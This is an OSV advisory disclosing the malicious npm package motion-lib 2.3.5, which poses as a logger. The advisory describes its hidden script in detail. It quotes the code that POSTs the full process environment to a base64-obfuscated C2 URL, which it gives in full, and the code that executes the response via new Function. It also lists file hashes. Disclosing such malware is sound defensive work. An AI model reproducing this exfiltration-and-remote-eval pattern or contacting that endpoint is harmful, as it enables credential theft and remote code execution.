MAL-2026-5925

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/motion-lib/MAL-2026-5925.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5925
Published
2026-06-16T19:46:09Z
Modified
2026-06-16T21:16:47.065403493Z
Summary
Malicious code in motion-lib (npm)
Details


Source: amazon-inspector (0dec07d83d6427eb2c76e0ab74e5f31f424e769c187e6d48df0de3575df2e176)

motion-lib@2.3.5 masquerades as a pino-style logger (exports module.exports.pino, ships proto.js/multistream.js/transport.js/redaction.js/levels.js, advertises 'fast', 'logger', 'stream', 'json' keywords), but its middleware factory in index.js spawns a detached node lib/initializeCaller.js. That script shadows process with a local object whose env.DEV_API_KEY holds a base64-encoded string that decodes to https://ipcheck-hashed.vercel.app/api/auth/6c1d60d35852ef0c05df, then POSTs the host's full real process.env to that endpoint with the header x-secret-header: secret (axios.post(apiEndpoint, {...process.env }, ...)). The HTTP response body is then executed via new Function('require', response.data); executor(require);, giving the remote endpoint arbitrary code execution with full Node capabilities (filesystem, network, child_process) on the installer's machine.

The combination of full-environment exfiltration (AWS_*, GITHUB_TOKEN, NPM_TOKEN, CI secrets, DB credentials), eval-of-remote-response RCE, base64 obfuscation of the C2 URL, and impersonation of a popular logger package is an unambiguous supply-chain attack.

Database specific
{
    "malicious-packages-origins": [
        {
            "sha256": "0dec07d83d6427eb2c76e0ab74e5f31f424e769c187e6d48df0de3575df2e176",
            "import_time": "2026-06-16T21:06:46.893333119Z",
            "source": "amazon-inspector",
            "modified_time": "2026-06-16T19:46:09Z",
            "versions": [
                "2.3.5"
            ],
            "id": "IN-MAL-2026-006827"
        }
    ]
}

Affected packages

Package: npm / motion-lib
Affected ranges: 2.*
Affected versions: 2.3.5

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "motion-lib-2.3.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-VqRbZ1gRQ03qx3Gt+NIJQ21VhgaS6GT5+W5WSRbBtAw+MyeIR5O1m/Wkk7NHThZpw4n0LvpLxSjwRgYsXjWs9g==",
                "sha1": "54e31dbde7db0816917f2c63b0934be741bce117"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "fc61b0ed62e346bfbb5e1e093e475d8b3065247dc8d315f0ea4e7cafd9661bad",
            "tlsh": "f921f38e15fe101d066751e6bb2f24027022e8133946d4a47bcc835b1fc966e99936df",
            "path": "lib/initializeCaller.js"
        },
        {
            "sha256": "1f51184c197102444a2c8a23e4a8e54a6479750420512922fcb5d5f795c33911",
            "tlsh": "0f318545b5f21259126d98c4f6b4a5263cdf9437331b76b1cded93952bce2080032bc7",
            "path": "index.js"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/motion-lib/MAL-2026-5925.json"
cwes
[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]